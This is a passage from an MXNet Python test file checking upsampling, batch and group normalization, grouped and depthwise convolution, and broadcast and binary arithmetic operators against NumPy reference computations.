up = mx.sym.UpSampling(*[mx.sym.Variable('arg_%d'%i) for i in range(len(shapes))], sample_type='nearest', scale=root_scale)
exe = up._bind(default_context(), args=arr, args_grad=arr_grad)
exe.forward(is_train=True)
exe.backward(exe.outputs)
for k in range(len(shapes)):
name = 'arg_%d'%k
assert_allclose(arr[name].asnumpy()*root_scale**2*scale**(2*k), arr_grad[name].asnumpy(), rtol=1e-4)
def check_bilinear_upsampling_with_shape(data_shape, weight_shape, scale, root_scale, num_filter):
def _init_bilinear(arr, f):
weight = np.zeros(np.prod(arr.shape), dtype='float32')
shape = arr.shape
c = (2 * f - 1 - f % 2) / (2. * f)
for i in range(np.prod(shape)):
x = i % shape[3]
y = (i // shape[3]) % shape[2]
weight[i] = (1 - abs(x / f - c)) * (1 - abs(y / f - c))
arr[:] = weight.reshape(shape)
return arr
up = mx.sym.UpSampling(mx.sym.Variable("data"),
mx.sym.Variable('weight'), sample_type='bilinear', scale=root_scale,
num_filter=num_filter, num_args=2)
arg_shapes, out_shapes, _ = up.infer_shape(data=data_shape)
arr = {'data': mx.random.uniform(-5, 5, data_shape, ctx=mx.cpu()).copyto(default_context()),
'weight': mx.nd.array(_init_bilinear(mx.ndarray.empty(arg_shapes[1]).asnumpy(), root_scale))}
arr_grad = [mx.nd.empty(s) for s in arg_shapes]
exe = up._bind(default_context(), args=arr, args_grad=arr_grad)
exe.forward(is_train=True)
out = exe.outputs[0].asnumpy()
exe.backward(exe.outputs)
target_shape = (data_shape[2] * root_scale, data_shape[3] * root_scale)
assert out.shape == data_shape[:2] + target_shape
def test_nearest_upsampling():
for root_scale in [1,2,3]:
for scale in [1,2,3]:
for num_shape in [1,2,3]:
for base in [1,2,3]:
shapes = [(1,3,base*root_scale*scale**(num_shape-1-i),base*root_scale*scale**(num_shape-1-i)) for i in range(num_shape)]
check_nearest_upsampling_with_shape(shapes, scale, root_scale)
def test_bilinear_upsampling():
rootscale = [2,3]
scales = [1,2,3]
filters = [1,2,3]
bases = [1,2,3]
for params in itertools.product(rootscale, scales, filters, bases):
root_scale, scale, num_filter, base = params
# bilinear upsampling takes only 1 data and 1 weight
# multi input mode is not applicable
dimension = base*root_scale*scale
kernel = 2 * root_scale - root_scale % 2
data_shape = (1, num_filter, dimension, dimension)
weight_shape = (1, num_filter, kernel, kernel)
check_bilinear_upsampling_with_shape(data_shape, weight_shape, scale, root_scale, num_filter)
def test_batchnorm_training():
def check_batchnorm_training(stype):
for shape in [(2, 3), (2, 3, 2, 2), (2, 8, 2, 2)]:
data_tmp = np.random.normal(-0.1, 0.1, size=shape)
s = shape[1],
gamma = np.ones(s)
beta = np.ones(s)
gamma[1] = 3
beta[0] = 3
rolling_mean = np.random.uniform(size=s)
rolling_std = np.random.uniform(size=s)
data = mx.symbol.Variable('data', stype=stype)
in_location = [mx.nd.array(data_tmp).tostype(stype), mx.nd.array(gamma).tostype(stype),
mx.nd.array(beta).tostype(stype)]
mean_std = [mx.nd.array(rolling_mean).tostype(stype), mx.nd.array(rolling_std).tostype(stype)]
test = mx.symbol.BatchNorm(data, fix_gamma=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm(data, fix_gamma=True, use_global_stats=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm(data, fix_gamma=False)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm(data, fix_gamma=False, use_global_stats=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
# Test varying channel axis
dim = len(shape)
for chaxis in range(-dim, dim):
chaxis_true = chaxis
if chaxis < 0:
chaxis_true = dim + chaxis
shapex = shape
channel_count = shapex[chaxis_true]
data_tmp = np.random.normal(-0.1, 0.1, size=shapex)
gamma = np.ones(channel_count)
beta = np.ones(channel_count)
if channel_count > 1:
gamma[1] = 3
beta[0] = 3
in_location = [mx.nd.array(data_tmp).tostype(stype), mx.nd.array(gamma).tostype(stype),
mx.nd.array(beta).tostype(stype)]
xrolling_mean = np.random.uniform(size=channel_count)
xrolling_std = np.random.uniform(size=channel_count)
xmean_std = [mx.nd.array(xrolling_mean).tostype(stype),
mx.nd.array(xrolling_std).tostype(stype)]
test = mx.symbol.BatchNorm(data, fix_gamma=True, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
test = mx.symbol.BatchNorm(data, fix_gamma=True, use_global_stats=True, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
test = mx.symbol.BatchNorm(data, fix_gamma=False, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
test = mx.symbol.BatchNorm(data, fix_gamma=False, use_global_stats=True, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
check_batchnorm_training('default')
@xfail_when_nonstandard_decimal_separator
@pytest.mark.parametrize('op_name', ['BatchNorm', 'SyncBatchNorm'])
@pytest.mark.parametrize('shape', [(4, 2), (4, 3, 4),
(4, 6, 4, 5), (4, 5, 6, 4, 5)])
@pytest.mark.parametrize('fix_gamma', [False, True])
@pytest.mark.parametrize('cudnn_off', [False, True])
@pytest.mark.parametrize('output_mean_var', [False, True])
def test_batchnorm(op_name, shape, fix_gamma, cudnn_off, output_mean_var):
if op_name == 'BatchNorm':
op = mx.nd.BatchNorm
elif op_name == 'SyncBatchNorm':
op = mx.nd.contrib.SyncBatchNorm
else:
raise ValueError(f'Not supported {op_name}')
momentum = 0.9
epsilon = 1e-5
def _test_batchnorm_impl(axis,
data_grad_req, gamma_grad_req, beta_grad_req):
kwargs = dict(output_mean_var=output_mean_var)
if op_name == 'SyncBatchNorm':
if axis != 1:
return
key = str(op) + str(shape) + str(axis)
kwargs.update(dict(key=key))
if cudnn_off:
return
else:
kwargs.update(dict(axis=axis, cudnn_off=cudnn_off))
nch = shape[axis]
if not fix_gamma:
bn_gamma = mx.nd.random.uniform(shape=(nch,))
bn_gamma.attach_grad(grad_req=gamma_grad_req)
else:
bn_gamma = mx.nd.ones(shape=(nch,))
bn_beta = mx.nd.random.uniform(shape=(nch,))
bn_beta.attach_grad(grad_req=beta_grad_req)
bn_running_mean = mx.nd.zeros(nch)
bn_running_var = mx.nd.ones(nch)
running_mean = mx.nd.zeros(nch)
running_var = mx.nd.ones(nch)
num_iters = 10
expand_shape = [1] * len(shape)
expand_shape[axis] = shape[axis]
data = mx.nd.random.uniform(shape=shape)
data.attach_grad(grad_req=data_grad_req)
adX, adW, adb = 0, 0, 0
is_train = data_grad_req != 'null' or \
(not fix_gamma and gamma_grad_req != 'null') or \
beta_grad_req != 'null'
for _ in range(num_iters):
if data_grad_req != 'add':
data = mx.nd.random.uniform(shape=shape)
data.attach_grad(grad_req=data_grad_req)
ograd = mx.nd.random.uniform(shape=shape)
with mx.autograd.record():
output = op(data, bn_gamma, bn_beta,
bn_running_mean, bn_running_var,
momentum=momentum, eps=epsilon,
fix_gamma=fix_gamma, **kwargs)
if output_mean_var:
output, output_mean, output_std = output
if is_train:
output.backward(ograd)
mx.nd.waitall()
data_mean = data.mean(
axis=axis, exclude=True, keepdims=True)
data_var = (data - data_mean).square().mean(axis=axis,
exclude=True,
keepdims=True)
target_output = (data - data_mean) / \
(data_var + epsilon).sqrt() * \
bn_gamma.reshape(expand_shape) + \
bn_beta.reshape(expand_shape)
# squeeze data_mean and data_var
data_mean_flat = data_mean.squeeze()
data_var_flat = data_var.squeeze()
running_mean = running_mean * momentum + \
data_mean_flat * (1 - momentum)
m = np.prod(shape) / shape[axis]
# cudnn uses m-1 in the denominator of its sample variance calculation, not m
sample_var_adjust = 1.0 if cudnn_off or fix_gamma else m / (m-1)
running_var = running_var * momentum + \
data_var_flat * sample_var_adjust * (1 - momentum)
W = bn_gamma.reshape(expand_shape)
dnx = ograd * W
xsm = data - data_mean
nd = 1.0 / mx.nd.sqrt(data_var + epsilon)
nx = xsm * nd
dvar = (dnx * xsm).sum(axis=axis, keepdims=True,
exclude=True) * (-0.5) * mx.nd.power(nd, 3)
dmean = -nd * dnx.sum(axis=axis, keepdims=True, exclude=True) - \
dvar * xsm.mean(axis=axis, keepdims=True,
exclude=True) * 2.0
dX = dnx * nd + dvar * xsm * (2.0 / m) + dmean * (1.0 / m)
dW = (ograd * nx).sum(axis=axis, exclude=True)
db = ograd.sum(axis=axis, exclude=True)
adX = dX if data_grad_req != 'add' else adX + dX
adW = dW if gamma_grad_req != 'add' else adW + dW
adb = db if beta_grad_req != 'add' else adb + db
atol, rtol = 5e-2, 5e-2
if output_mean_var:
assert_almost_equal(output_mean.asnumpy(),
data_mean_flat.asnumpy(),
atol=atol, rtol=rtol)
if op != mx.nd.contrib.SyncBatchNorm:
assert_almost_equal(output_std.asnumpy(),
(1.0 / (data_var_flat +
epsilon).sqrt()).asnumpy(),
atol=atol, rtol=rtol)
else:
assert_almost_equal(output_std.asnumpy(),
data_var_flat.asnumpy(),
atol=atol, rtol=rtol)
assert_almost_equal(output.asnumpy(), target_output.asnumpy(),
atol=atol, rtol=rtol)
if is_train:
assert_almost_equal(bn_running_mean.asnumpy(
), running_mean.asnumpy(), atol=atol, rtol=rtol)
assert_almost_equal(bn_running_var.asnumpy(
), running_var.asnumpy(), atol=atol, rtol=rtol)
if data_grad_req != 'null':
assert_almost_equal(data.grad.asnumpy(),
adX.asnumpy(), atol=atol, rtol=rtol)
if not fix_gamma:
if gamma_grad_req != 'null':
assert_almost_equal(
bn_gamma.grad.asnumpy(), adW.asnumpy(),
atol=atol, rtol=rtol)
else:
assert((bn_gamma.asnumpy() == 1).all())
if beta_grad_req != 'null':
assert_almost_equal(
bn_beta.grad.asnumpy(), adb.asnumpy(), atol=atol, rtol=rtol)
grad_reqs = ['write'] if len(shape) != 4 else ['null', 'write', 'add']
for data_grad_req in grad_reqs:
for gamma_grad_req in grad_reqs:
if fix_gamma and gamma_grad_req != 'null':
continue
for beta_grad_req in grad_reqs:
for axis in range(len(shape)):
_test_batchnorm_impl(axis,
data_grad_req, gamma_grad_req, beta_grad_req)
def test_groupnorm():
acc_types = {'float16': 'float32', 'float32': 'float64', 'float64': 'float64'}
def x_hat_helper(x, num_groups, eps):
dtype = x.dtype
dshape = x.shape
assert len(dshape) == 4
acc_type = acc_types[str(dtype)]
new_shape = (dshape[0], num_groups, int(dshape[1] / num_groups), dshape[2], dshape[3])
new_moments_shape = (dshape[0], num_groups, 1, 1, 1)
data = x.reshape(new_shape)
mean = np.mean(data, axis=(2, 3, 4), keepdims=False, dtype=acc_type).astype(dtype)
std = np.sqrt(np.var(data, axis=(2, 3, 4), dtype=acc_type, keepdims=False).astype(dtype) + eps)
x_hat = (data - mean.reshape(new_moments_shape)) / std.reshape(new_moments_shape)
return x_hat, mean, std
def np_groupnorm(data, gamma, beta, num_groups, eps):
new_param_shape = (1, dshape[1], 1, 1)
x_hat, mean, std = x_hat_helper(data, num_groups, eps)
out = x_hat.reshape(dshape) * gamma.reshape(new_param_shape) + beta.reshape(new_param_shape)
return out, mean, std
def np_groupnorm_grad(ograd, data, gamma, beta, mean, std, num_groups, eps):
x_hat, mean, std = x_hat_helper(data, num_groups, eps)
new_shape = x_hat.shape
dshape = data.shape
dtype = data.dtype
new_moments_shape = (new_shape[0], num_groups, 1, 1, 1)
new_param_shape = (1, dshape[1], 1, 1)
acc_type = acc_types[str(dtype)]
ograd = ograd.reshape(new_shape)
data = data.reshape(new_shape)
gamma = gamma.reshape(new_param_shape)
beta = beta.reshape(new_param_shape)
mean = mean.reshape(new_moments_shape)
std = std.reshape(new_moments_shape)
beta_grad = np.sum(ograd, axis=(0, 3, 4), dtype=acc_type, keepdims=False).astype(dtype).flatten()
gamma_grad = np.sum(x_hat * ograd, axis=(0, 3, 4), dtype=acc_type, keepdims=False).astype(dtype).flatten()
x_hat_grad = ograd * gamma.reshape(1, num_groups, dshape[1] // num_groups, 1, 1)
ograd_mult = x_hat_grad / std
red_out = np.mean(ograd_mult, axis=(2, 3, 4), dtype=acc_type, keepdims=True).astype(dtype)
data_grad = ograd_mult - red_out
red_out = np.mean(ograd_mult * x_hat, axis=(2, 3, 4), dtype=acc_type, keepdims=True).astype(dtype)
data_grad = data_grad - x_hat * red_out
return data_grad.reshape(dshape), gamma_grad, beta_grad
batch_size = random.randint(1, 8)
num_groups = random.randint(2, 3)
num_channels = random.randint(2, 3) * num_groups
height = random.randint(1, 5)
width = random.randint(1, 5)
dshape = (batch_size, num_channels, height, width)
param_shape = (num_channels,)
temp_shape = (batch_size, num_groups, int(num_channels / num_groups), height, width)
np_data = np.random.uniform(0.2, 1.0, dshape)
np_gamma = np.random.uniform(-1.0, 1.0, param_shape)
np_beta = np.random.uniform(-1.0, 1.0, param_shape)
data_sym = mx.sym.Variable("data")
gamma_sym = mx.sym.Variable("gamma")
beta_sym = mx.sym.Variable("beta")
for dtype in [np.float16, np.float32, np.float64]:
eps = 1e-2 if dtype == np.float16 else 1e-5
mx_data = mx.nd.array(np_data, dtype=dtype)
mx_gamma = mx.nd.array(np_gamma, dtype=dtype)
mx_beta = mx.nd.array(np_beta, dtype=dtype)
np_out, np_mean, np_std = np_groupnorm(np_data.astype(dtype),
np_gamma.astype(dtype),
np_beta.astype(dtype),
num_groups=num_groups,
eps=eps)
mx_sym = mx.sym.GroupNorm(data=data_sym, gamma=gamma_sym, beta=beta_sym,
num_groups=num_groups, eps=eps, output_mean_var=True)
check_symbolic_forward(mx_sym, [mx_data, mx_gamma, mx_beta], [np_out, np_mean, np_std],
rtol=1e-2 if dtype == np.float16 else 1e-3,
atol=5e-3 if dtype == np.float16 else 1e-4, dtype=dtype)
mx_sym = mx.sym.GroupNorm(data=data_sym, gamma=gamma_sym, beta=beta_sym,
num_groups=num_groups, eps=eps, output_mean_var=False)
np_ograd = np.random.uniform(-1.0, 1.0, dshape).astype(dtype)
np_data_grad, np_gamma_grad, np_beta_grad = np_groupnorm_grad(np_ograd,
np_data.astype(dtype),
np_gamma.astype(dtype),
np_beta.astype(dtype),
np_mean, np_std,
num_groups, eps)
check_symbolic_backward(mx_sym, [mx_data, mx_gamma, mx_beta], [mx.nd.array(np_ograd, dtype=np_ograd.dtype)],
[np_data_grad, np_gamma_grad, np_beta_grad],
rtol=1e-2 if dtype == np.float16 else 1e-3,
atol=5e-2 if dtype == np.float16 else 1e-4, dtype=dtype)
def test_convolution_grouping():
for dim in [1, 2, 3]:
num_filter = 4
for num_group in [1, 2]:
kernel = (3,) * dim
shape = (1, 4) + (9,) * dim
x = mx.sym.Variable('x')
w = mx.sym.Variable('w')
b = mx.sym.Variable('b')
y1 = mx.sym.Convolution(data=x, weight=w, bias=b, num_filter=num_filter, num_group=num_group, kernel=kernel)
xslice = mx.sym.SliceChannel(data=x, num_outputs=num_group, axis=1)
wslice = mx.sym.SliceChannel(data=w, num_outputs=num_group, axis=0)
bslice = mx.sym.SliceChannel(data=b, num_outputs=num_group, axis=0)
y2 = mx.sym.Concat(*[mx.sym.Convolution(data=xslice[i], weight=wslice[i], bias=bslice[i],
num_filter=num_filter//num_group, kernel=kernel)
for i in range(num_group)])
exe1 = y1._simple_bind(default_context(), x=shape)
exe2 = y2._simple_bind(default_context(), x=shape, w=(num_filter, shape[1]//num_group) + kernel, b=(num_filter,))
for arr1, arr2 in zip(exe1.arg_arrays, exe2.arg_arrays):
arr1[:] = np.float32(np.random.normal(size=arr1.shape))
arr2[:] = arr1
exe1.forward(is_train=True)
exe1.backward(exe1.outputs[0])
exe2.forward(is_train=True)
exe2.backward(exe2.outputs[0])
for arr1, arr2 in zip(exe1.outputs + exe1.grad_arrays, exe2.outputs + exe2.grad_arrays):
np.testing.assert_allclose(arr1.asnumpy(), arr2.asnumpy(), rtol=1e-3, atol=1e-3)
@pytest.mark.skip(reason="Flaky test https://github.com/apache/incubator-mxnet/issues/14052")
def test_depthwise_convolution():
for dim in [1,2]:
for num_base in [1, 4, 16, 32, 64]:
for kernel_x in [3, 5]:
for stride_x in [1, 2]:
for pad_x in [0, 1]:
for in_size in [7, 32]:
kernel = (kernel_x,) * dim
stride = (stride_x,) * dim
pad = (pad_x,) * dim
num_filter = num_base
num_group = num_base
shape = (2, num_base) + (in_size,) * dim
x = mx.sym.Variable('x')
w = mx.sym.Variable('w')
b = mx.sym.Variable('b')
y1 = mx.sym.Convolution(data=x, weight=w, bias=b, num_filter=num_filter, num_group=num_group,
kernel=kernel, stride=stride, pad=pad)
xslice = mx.sym.SliceChannel(data=x, num_outputs=num_group, axis=1)
wslice = mx.sym.SliceChannel(data=w, num_outputs=num_group, axis=0)
bslice = mx.sym.SliceChannel(data=b, num_outputs=num_group, axis=0)
y2 = mx.sym.Concat(*[mx.sym.Convolution(data=xslice[i], weight=wslice[i], bias=bslice[i],
num_filter=num_filter//num_group, kernel=kernel,
stride=stride, pad=pad)
for i in range(num_group)])
dev = default_context()
exe1 = y1._simple_bind(dev, x=shape)
exe2 = y2._simple_bind(dev, x=shape, w=(num_filter, shape[1]//num_group)+kernel,
b=(num_filter,))
for arr1, arr2 in zip(exe1.arg_arrays, exe2.arg_arrays):
arr1[:] = np.random.normal(size=arr1.shape)
arr2[:] = arr1
exe1.forward(is_train=True)
exe1.backward(exe1.outputs[0])
exe2.forward(is_train=True)
exe2.backward(exe2.outputs[0])
for arr1, arr2 in zip(exe1.outputs + exe1.grad_arrays, exe2.outputs + exe2.grad_arrays):
assert_allclose(arr1, arr2, rtol=1e-3, atol=1e-3)
def test_convolution_independent_gradients():
# NOTE(zixuanweeei): Flaky test tracked by https://github.com/apache/incubator-mxnet/issues/15603.
# GPU context will be enabled after figuring out the possible issue tracked at
# https://github.com/apache/incubator-mxnet/issues/15638.
ctx = mx.cpu()
atol = 1.0e-3
rtol = 1.0e-3
reqs = ["null", "write", "add"]
var_names = ["x", "w", "b"]
dims = [1, 2]
num_bases = [1, 8]
kernel_xs = [3, 5]
stride_xs = [1, 2]
pad_xs = [0, 1]
in_sizes = [7, 32]
no_biases = [True, False]
for dim, num_base, kernel_x, stride_x, pad_x , in_size, no_bias in \
itertools.product(dims, num_bases, kernel_xs, stride_xs, pad_xs, in_sizes, no_biases):
# Prepare params shape
kernel = (kernel_x,) * dim
stride = (stride_x,) * dim
pad = (pad_x,) * dim
num_filter = num_base
x_shape = (2, num_base) + (in_size,) * dim
w_shape = (num_filter, num_base) + kernel
# Symbols definition
x = mx.sym.Variable('x')
w = mx.sym.Variable('w')
b = mx.sym.Variable('b') if not no_bias else None
conv = mx.sym.Convolution(x, w, b, num_filter=num_filter,
kernel=kernel, stride=stride, pad=pad, no_bias=no_bias)
for req_kind in reqs:
# Binding args for conv with possible dependent gradients
base_args = {
'x': mx.nd.random.normal(shape=x_shape, ctx=ctx),
'w': mx.nd.random.normal(shape=w_shape, ctx=ctx),
'b': mx.nd.random.normal(shape=(num_filter, ), ctx=ctx) if not no_bias else None}
args1 = copy.deepcopy(base_args)
grad1 = {
'x': mx.nd.zeros(shape=x_shape, ctx=ctx),
'w': mx.nd.zeros(shape=w_shape, ctx=ctx),
'b': mx.nd.zeros(shape=(num_filter, ), ctx=ctx) if not no_bias else None}
grad_req1 = [req_kind] * 3
grad_req1 = dict(zip(var_names, grad_req1))
exe1 = conv._bind(ctx, args1, args_grad=grad1, grad_req=grad_req1)
exe1.forward(is_train=True)
exe1.backward(exe1.outputs[0])
for x_req, w_req, b_req in itertools.product(reqs, repeat=3):
# Binding args for conv with independent gradients
args2 = copy.deepcopy(base_args) # Deepcopy the same params of `exe1`
grad2 = {
'x': mx.nd.zeros(shape=x_shape, ctx=ctx),
'w': mx.nd.zeros(shape=w_shape, ctx=ctx),
'b': mx.nd.zeros(shape=(num_filter, ), ctx=ctx) if not no_bias else None}
grad_req2 = {"x": x_req, "w": w_req, "b": b_req}
exe2 = conv._bind(ctx, args2, args_grad=grad2, grad_req=grad_req2)
exe2.forward(is_train=True)
np.testing.assert_allclose(exe1.outputs[0].asnumpy(),
exe2.outputs[0].asnumpy(), rtol=rtol, atol=atol)
exe2.backward(exe2.outputs[0])
for var_name in var_names:
if var_name == "b" and no_bias:
continue
if grad_req2[var_name] == "null":
exe2_var_grad = grad2[var_name].asnumpy()
np.testing.assert_allclose(exe2_var_grad,
np.zeros_like(exe2_var_grad), rtol=rtol, atol=atol)
if grad_req2[var_name] != grad_req1[var_name]:
continue
np.testing.assert_allclose(args1[var_name].asnumpy(),
args2[var_name].asnumpy(), rtol=rtol, atol=atol)
np.testing.assert_allclose(grad1[var_name].asnumpy(),
grad2[var_name].asnumpy(), rtol=rtol, atol=atol)
def gen_broadcast_data(idx):
# Manually set test cases
binary_op_data_shape = np.array(
[[[2, 5, 1, 30, 7], [1, 5, 448, 30, 1]],
[[10, 49, 1, 77, 17], [10, 1, 2, 1, 17]],
[[13, 2, 65, 2, 1], [13, 1, 65, 1, 225]],
[[9, 434, 4, 2, 37], [9, 1, 4, 1, 37]],
[[2, 52, 1, 4, 1], [1, 52, 60, 1, 37]],
[[1, 23, 7, 122, 50], [2, 1, 7, 1, 50]],
[[1, 17, 1, 5, 1], [22, 1, 2, 1, 28]],
[[29, 1, 2, 1, 8], [29, 22, 1, 130, 1]],
[[2, 36, 1, 427, 3], [1, 36, 11, 427, 1]],
[[1, 2, 1, 100, 7], [1, 2, 448, 100, 1]],
[[1, 2, 495, 77, 7], [1, 2, 1, 1, 7]],
[[1, 43, 65, 2, 1], [1, 43, 65, 1, 225]],
[[1, 92, 434, 2, 2], [1, 92, 1, 2, 2]],
[[1, 92, 1, 4, 1], [1, 92, 134, 1, 17]],
[[1, 53, 2, 122, 143], [1, 1, 2, 1, 143]],
[[1, 179, 1, 87, 17], [1, 179, 1, 1, 17]],
[[1, 1, 17, 5, 1], [1, 22, 1, 1, 28]],
[[1, 2, 1, 1, 8], [1, 2, 52, 430, 1]],
[[1, 163, 1, 22, 3], [1, 163, 116, 22, 1]],
[[1, 1, 44, 30, 7], [1, 1, 44, 30, 1]],
[[1, 1, 1, 1, 28], [1, 127, 1, 5, 28]],
[[1, 2, 394, 38, 1], [1, 2, 394, 38, 16]],
[[1, 10, 49, 77, 17], [1, 1, 1, 1, 17]],
[[1, 431, 6, 2, 225], [1, 1, 6, 2, 225]],
[[1, 15, 1, 28, 1], [1, 15, 1, 28, 463]],
[[1, 129, 2, 48, 96], [1, 129, 2, 1, 1]],
[[1, 1, 403, 17, 2], [1, 44, 403, 17, 2]],
[[1, 1, 65, 2, 22], [1, 1, 65, 1, 1]],
[[1, 24, 103, 17, 18], [1, 24, 1, 1, 1]],
[[1, 1, 1, 1, 2], [1, 24, 194, 50, 1]],
[[1, 1, 107, 84, 9], [1, 1, 1, 1, 1]]])
if idx < binary_op_data_shape.shape[0]:
l_shape = binary_op_data_shape[idx][0]
r_shape = binary_op_data_shape[idx][1]
else:
# Generate random data that has ndim between 1-7 and all the shape dims between 1-5
ndim = np.random.randint(1, 6)
shape = np.random.randint(1, 6, size=(ndim,))
l_same_dim = np.random.randint(0, 5)
r_same_dim = np.random.randint(0, 5)
l_axis_flags = np.random.randint(0, 2, size=ndim)
r_axis_flags = np.random.randint(0, 2, size=ndim)
if l_same_dim == 4:
l_axis_flags = np.ones(ndim)
if r_same_dim == 4:
r_axis_flags = np.ones(ndim)
l_shape = shape.copy()
r_shape = shape.copy()
l_shape[np.where(l_axis_flags == 0)] = 1
r_shape[np.where(r_axis_flags == 0)] = 1
return [np.random.random(l_shape), np.random.random(r_shape)]
def gen_broadcast_data_int(idx):
d = gen_broadcast_data(idx);
return [np.round(d[0]*100).astype(int), np.round(d[1]*100).astype(int)]
def gen_binary_data(dummy):
ndim = np.random.randint(1, 6)
shape = np.random.randint(1, 6, size=(ndim,))
#print("gen shape {}".format(shape))
return [np.random.random(shape), np.random.random(shape)]
def gen_binary_data_int(dummy):
d = gen_binary_data(dummy);
return [np.round(d[0]*100).astype(int), np.round(d[1]*100).astype(int)]
def check_binary_op_forward(symbol, baseline, gen_data, rtol=1e-3, atol=1e-5, mx_nd_func=None):
sample_num = 200
for i in range(sample_num):
d = gen_data(i)
y = symbol._bind(default_context(), args={'a': mx.nd.array(d[0]), 'b': mx.nd.array(d[1])})
y.forward(is_train=True)
y = y.outputs[0].asnumpy()
x = baseline(d[0], d[1]).astype(y.dtype)
#np.set_printoptions(precision=20)
a = d[0]
b = d[1]
#print("a: {} {}".format(a.dtype, a))
#print("a: {} {}".format(b.dtype, b))
#print("x: {} {}".format(x.dtype, x))
#print("y: {} {}".format(y.dtype, y))
if mx_nd_func is not None:
d0 = mx.nd.array(d[0], dtype=d[0].dtype)
d1 = mx.nd.array(d[1], dtype=d[1].dtype)
assert_almost_equal(y, mx_nd_func(d0, d1).asnumpy(), rtol=rtol, atol=atol)
idx = np.abs(x-y) > atol+rtol*np.abs(x)
if idx.any():
import binascii
np.set_printoptions(precision=20)
logging.error('found precision problem:')
d[0] = np.broadcast_to(d[0], x.shape)
d[1] = np.broadcast_to(d[1], x.shape)
logging.error('input a: {}'.format(d[0][idx]))
logging.error('input b: {}'.format(d[1][idx]))
logging.error("output x: {} {}".format(x.dtype, x))
logging.error("output y: {} {}".format(y.dtype, y))
def ftohex(xs):
import struct
return list(map(lambda x: binascii.hexlify(struct.pack('d', x)), xs.flatten()))
logging.error('output x in baseline(a, b): {}'.format(x[idx]))
logging.error('output y in symbol(a, b): {}'.format(y[idx]))
logging.error('output x in baseline(a,b) hex: {}'.format(ftohex(x[idx])))
logging.error('output y in symbol(a,b) hex: {}'.format(ftohex(y[idx])))
logging.error('input a hex: {}'.format(ftohex(d[0][idx])))
logging.error('input a hex: {}'.format(ftohex(d[1][idx])))
logging.error('diff: {}'.format(np.abs(x-y)[idx] - atol-rtol*np.abs(x)[idx]))
assert_allclose(y, x, rtol=rtol, atol=atol)
def check_binary_op_backward(symbol, baseline, gen_data, rtol=1e-3, atol=1e-5):
sample_num = 200
for i in range(sample_num):
d = gen_data(i)
out = np.random.random((d[0] + d[1]).shape)
def reduce_op(shape, x):
if shape == x.shape:
return x
keepdims_shape = list(x.shape)
for i in range(len(shape)):
if x.shape[i] != shape[i]:
keepdims_shape[i] = 1
x = np.sum(x, axis=i).reshape(keepdims_shape)
return x
baseline_grad1, baseline_grad2 = baseline(out, d[0], d[1])
x_1 = reduce_op(d[0].shape, baseline_grad1)
x_2 = reduce_op(d[1].shape, baseline_grad2)
y_1 = mx.nd.empty(d[0].shape)
y_2 = mx.nd.empty(d[1].shape)
y = symbol._bind(default_context(), args={'a': mx.nd.array(d[0]), 'b': mx.nd.array(d[1])},
args_grad=[y_1, y_2])
o = y.forward(is_train=True)
y.backward([mx.nd.array(out, dtype=o[0].dtype)])
assert_allclose(y_1.asnumpy(), x_1, rtol=rtol, atol=atol)
assert_allclose(y_2.asnumpy(), x_2, rtol=rtol, atol=atol)
def test_binary_op():
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
def test_bplus(a, b):
c = a + b
check_binary_op_forward(c, lambda a, b: a + b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, g_out), gen_binary_data)
def test_bminus(a, b):
c = a - b
check_binary_op_forward(c, lambda a, b: a - b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, - g_out), gen_binary_data)
def test_bmul(a, b):
c = a * b
check_binary_op_forward(c, lambda a, b: a * b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * b, g_out * a), gen_binary_data)
def test_bdiv(a, b):
c = a / b
check_binary_op_forward(c, lambda a, b: a / b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out / b, - g_out * a / (b * b)), gen_binary_data)
def test_bmod(a, b):
# Python and numpy operate only in double so to avoid numerical errors we have to use
# doubles as well. This was a flaky test before when using float32. seed 1688524483, 1768433044
#c = a % b
c = mx.sym.cast(a, dtype='float64') % mx.sym.cast(b, dtype='float64')
# '%' is sensitive to the precision of the calculation. Force numpy to match mxnet's float32.
check_binary_op_forward(c, lambda a, b: np.float32(a) % np.float32(b), gen_binary_data, rtol=0, atol=0)
check_binary_op_backward(c,
lambda g_out, a, b: (g_out, - g_out * (np.float32(a) // np.float32(b))), gen_binary_data)
def test_bmod_int(a, b):
c = mx.sym.cast(a, dtype='int32') % mx.sym.cast(b, dtype='int32')
check_binary_op_forward(c, lambda a, b: a % b, gen_binary_data_int)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_binary_data_int)
def test_bpow(a, b):
c = a ** b
check_binary_op_forward(c, lambda a, b: a ** b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * a **(b - 1) * b,
g_out * a ** b * np.log(a)), gen_binary_data)
def test_bneq(a, b):
c = a != b
# '!=' is sensitive to the precision of the comparison. Force numpy to match mxnet's float32.
# Issue exposed with seed 1644387363
check_binary_op_forward(c, lambda a, b: (np.float32(a) != np.float32(b)).astype(a.dtype), gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_binary_data)
test_bplus(a, b)
test_bminus(a, b)
test_bmul(a, b)
test_bdiv(a, b)
test_bmod(a, b)
test_bmod_int(a, b)
test_bpow(a, b)
test_bneq(a, b)
def test_broadcast_binary_op():
def check_bmaxmin_gradient(test_sym, x, y, delta, rtol, atol):
"""This function ensures that checking the numerical gradient of
broadcast_max/min is not crossing the boundary y=x where there
